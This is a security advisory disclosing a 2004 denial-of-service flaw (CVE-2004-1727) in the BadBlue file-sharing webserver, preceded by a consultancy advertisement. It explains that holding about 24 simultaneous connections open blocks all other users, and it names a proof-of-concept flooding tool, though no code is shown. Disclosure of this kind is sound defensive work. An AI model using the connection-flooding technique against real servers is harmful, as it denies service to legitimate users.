Are you looking to have your application properly secured by an experienced professional? Contact us today for a free private consultation. We specialize in web application security, mobile security, and also offer general consultation services. Click here for more information regarding all of our security services.
BadBlue Denial Of Service
Vendor: BadBlue
Product: BadBlue
Version: <= 2.5
Website: http://www.badblue.com
BID: 10983
CVE: CVE-2004-1727
OSVDB: 9107
SECUNIA: 12346
PACKETSTORM: 34103
Description:
Share photos, videos, music, and business files with friends and colleagues instantly. Tired of paying a service to share your files (and the hassle of sending your files to their site) BadBlue shares files directly from your own PC, using the cable /DSL/broadband/dialup connection you already paid for! BadBlue lets you run a no-hassle Web site on your own PC for free, including a domain name you can choose. Within seconds, you can transform your PC into a friendly, file-sharing Web server with all the power of a real server on the Internet. Remote users can search for files, explore your shared folders, and run full-blown applications created in HTML, PHP, Perl, and so on.

Denial Of Service Vulnerability:
BadBlue Webserver cannot handle multiple connections from the same host, and will deny all acess to any users at right around twenty four simultaneous connections. I have included a proof of concept that floods the target server with a number of connections, and then basically keeps those connections up for as long as you specify, thus blocking all other traffic to the affected server.

Proof of Concept:
BadBlue Webserver Denial of Service POC Code

Solution:
The development team has been contacted and said they will be looking into this issue shortly. Users are advised to upgrade as soon as possible.

Credits:
James Bercegay of the GulfTech Security Research Team.